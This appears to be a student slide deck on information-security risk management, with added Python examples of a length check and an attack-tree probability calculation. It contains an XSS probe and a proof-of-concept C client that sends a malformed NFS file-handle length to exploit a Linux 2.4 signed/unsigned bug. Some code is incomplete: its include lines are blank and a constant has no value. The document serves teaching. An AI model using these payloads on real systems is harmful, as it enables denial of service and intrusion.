Risk Management. Prepared by: Mahmoud elmadhoun. Supervised by: Ms. eman elagrami
Agenda: the definition of risk and its sections; countermeasures in the event of risk; how to manage risk and probability.
The definition of risk and its sections: Risk is the probability that a threat exists and can be exploited; the weakness that the threat makes use of is called the vulnerability. From this definition, risk can be separated into two main sections. Threat: the process of trying to gain access to confidential information of the organization. Vulnerabilities: weaknesses in the organization through which the attacker can get in.
Vulnerabilities are of two types. Technical vulnerability: protection is weak, and when an attacker uses this vulnerability the attack is known as a technical attack. Administrative vulnerability: the attack is the so-called non-technical or social engineering attack.
Vulnerabilities can also be divided, in terms of ease and difficulty, into two levels. High-level vulnerability: easy to use, for example by writing software code to exploit that gap. Low-level vulnerability: more difficult to use, requiring a lot of financial resources or a long time from the attacker.
Example: the XSS (Cross-Site Scripting) vulnerability (HTML, JavaScript, VBScript, ActiveX, Flash). Amend the URL address for a given site: alert('Welcome')
Please login with the form below before proceeding: Login: Password:
Vulnerabilities: linux-2.4, signed/unsigned

    static inline u32 *decode_fh(u32 *p, struct svc_fh *fhp)
    {
        unsigned int size;

        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);        /* length word taken from the request */
        if (size > NFS3_FHSIZE)    /* reject a handle longer than the maximum */
            return NULL;
        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
    }
Code

    #include
    #include
    #define NFSPROG
    #define NFSVERS 3
    #define NFSPROC_GETATTR 1

    static struct diropargs heh;

    /* XDR encoder that writes one 32-bit word, -1, in place of the call arguments */
    bool_t xdr_heh(XDR *xdrs, diropargs *heh)
    {
        int32_t werd = -1;
        return xdr_int32_t(xdrs, &werd);
    }

    int main(void)
    {
        CLIENT * client;
        struct timeval tv;

        client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");
        if(client == NULL) {
            perror("clnt_create\n");
        }
        tv.tv_sec = 3;
        tv.tv_usec = 0;
        client->cl_auth = authunix_create_default();
        clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh, (xdrproc_t) xdr_void, NULL, tv);
        return 0;
    }
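Why the declared type of size decides the outcome of the length check in decode_fh, as an added Python model (not code from the slides or from the kernel). It assumes NFS3_FHSIZE is 64, the NFSv3 maximum handle length; the function names and both sample requests are constructed for this illustration.

```python
import struct

NFS3_FHSIZE = 64  # assumption: NFSv3 maximum file handle length in bytes


def length_word(buf, signed):
    """Read the 4-byte big-endian XDR length word, interpreted the way C
    would see it in an `int` (signed=True) or an `unsigned int`."""
    return struct.unpack(">i" if signed else ">I", buf[:4])[0]


def passes_bound_check(buf, signed):
    """Model of `if (size > NFS3_FHSIZE) return NULL;` for either type."""
    return not (length_word(buf, signed) > NFS3_FHSIZE)


def decode_fh(buf):
    """Strict decoder: return (handle, rest) or None for a malformed handle."""
    if len(buf) < 4:
        return None
    size = length_word(buf, signed=False)
    if size > NFS3_FHSIZE:
        return None
    padded = (size + 3) & ~3          # XDR pads opaque data to 4-byte units
    if len(buf) < 4 + padded:         # never read past the received data
        return None
    return buf[4:4 + size], buf[4 + padded:]


# Constructed samples: the single word -1 that xdr_heh encodes, and a
# well-formed 8-byte handle.
MALFORMED = struct.pack(">i", -1)
VALID = struct.pack(">I", 8) + b"\x01" * 8

if __name__ == "__main__":
    for signed in (True, False):
        kind = "int" if signed else "unsigned int"
        print(f"{kind:>12}: size={length_word(MALFORMED, signed)} "
              f"passes check={passes_bound_check(MALFORMED, signed)}")
    print("strict decode of malformed request:", decode_fh(MALFORMED))
    print("strict decode of valid request:", decode_fh(VALID))
```

With a signed size the word 0xffffffff compares as -1 and passes the bound check; with the unsigned declaration shown on the slide it compares as 4294967295 and is rejected.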
Threat: there are three essential components of a threat: target, agent, event.
Target: the organization's information, on which the attacker can act in each of the following ways. Confidentiality: disclosing confidential information to others. Integrity: the possibility of changing the organization's information. Availability: by denial of service (DoS). Accountability: the attacker conceals the attack so as not to be punished for it.
Agents: an agent must have three features. Access to the target: it may be direct access, that is, an account used to enter the system, or indirect access through an intermediary. Knowledge about the target. Motivation.
Events: events take many forms; the most important are unauthorized access and misuse of authorized access to the information or the system, or the placing of malicious code (viruses or Trojans) in the systems.
Countermeasures in the event of risk: Information varies from facility to facility, and its importance varies from institution to institution. Depending on the importance of the information, appropriate action may be taken before a danger occurs, which is called the Proactive Model, or after the danger has occurred, which is called the Reactive Model.
Countermeasures in the event of risk: some examples of countermeasures to a threat or attack are firewalls, anti-virus software, access control, two-factor authentication systems, and well-trained employees.
How to manage the risk and probability: the steps involved in risk management are risk analysis, decision management, and implementation.
How to manage the risk and probability: risk management intervention is divided into two models. Reactive Model: a very well-known type, the so-called emotional intervention. For example, a security official in the company installs an anti-virus program after the virus has spread and destroyed some devices. It can be calculated as follows: Protection cost = total cost of the risk + the cost of countermeasures
How to manage the risk and probability: Proactive Model: intervention prior to the risk. This type is much better in terms of cost. Protection cost = cost of the minimum risk + the cost of countermeasures
How to manage the risk and probability: Calculating the probability of a threat: start with the threat at the top of a tree. Search for the paths leading to the occurrence of the potential threat. Combine these paths using (OR, AND). To calculate the probability, we start from the top down.
Example: the attacker tries to break the root password. Either the attacker tries to find the root password by guessing (guessing the root password), or the attacker attacks the network as a whole to try to find bugs in the network. For the bugs, two conditions must be met: 1- there are gaps that can be exploited (AND, not OR: the second condition must also hold) 2- the system has not been updated (b Trigram any potential path for this gap
P(A) = P(guessing root password) = 5/1000 = 0.005
P(B) = P(exploiting active server) = 50/1000 = 0.05 (AND)
P(C) = P(system is not updated or not configured properly) = 0.1
How to manage the risk and probability: The assumption is that the break-in happens either by guessing the password (A) or by exploiting the gap (B), the latter only if the system is not updated (C).
P(attack service) = P(BC) = P(B) * P(C) = 0.05 * 0.1 = 0.005 (AND)
P(break-in) = P(A) + P(BC) - P(A) * P(BC) = 0.005 + 0.005 - 0.005 * 0.005 = 0.009975 (OR) (total probability of break-in)
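The tree calculation above as an added Python example (not part of the original slides). It generalizes the two-branch OR formula to any number of independent children, using 1 minus the product of (1 - p), and adds a hypothetical residual_risk helper that shows what each countermeasure would leave; all class and function names are assumptions made here.

```python
from dataclasses import dataclass, field
from math import prod


@dataclass
class Node:
    name: str
    gate: str = "LEAF"            # "LEAF", "AND" or "OR"
    p: float = 0.0                # used by leaves only
    children: list = field(default_factory=list)


def probability(node):
    """Probability of the node's event, assuming independent children."""
    if node.gate == "LEAF":
        if not 0.0 <= node.p <= 1.0:
            raise ValueError(f"{node.name}: probability out of range")
        return node.p
    if not node.children:
        raise ValueError(f"{node.name}: gate without children")
    ps = [probability(c) for c in node.children]
    if node.gate == "AND":        # every child must happen
        return prod(ps)
    if node.gate == "OR":         # at least one child happens
        return 1.0 - prod(1.0 - p for p in ps)
    raise ValueError(f"{node.name}: unknown gate {node.gate!r}")


def leaves(node):
    if node.gate == "LEAF":
        return [node]
    return [leaf for c in node.children for leaf in leaves(c)]


def residual_risk(root):
    """Root probability if a countermeasure drives one leaf to zero."""
    out = {}
    for leaf in leaves(root):
        saved, leaf.p = leaf.p, 0.0
        out[leaf.name] = probability(root)
        leaf.p = saved
    return out


def slide_tree():
    """The tree from the slides, with the slides' probabilities."""
    a = Node("A: guessing root password", p=5 / 1000)
    b = Node("B: exploiting active server", p=50 / 1000)
    c = Node("C: system not updated or not configured properly", p=0.1)
    bc = Node("BC: attack service", "AND", children=[b, c])
    return Node("break-in", "OR", children=[a, bc])


if __name__ == "__main__":
    tree = slide_tree()
    print(f"P(break-in) = {probability(tree):.6f}")
    for name, p in residual_risk(tree).items():
        print(f"  with '{name}' eliminated: {p:.6f}")
```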
Reference: Cryptography and Network Security, 4th Edition, Prentice Hall, Nov. 2005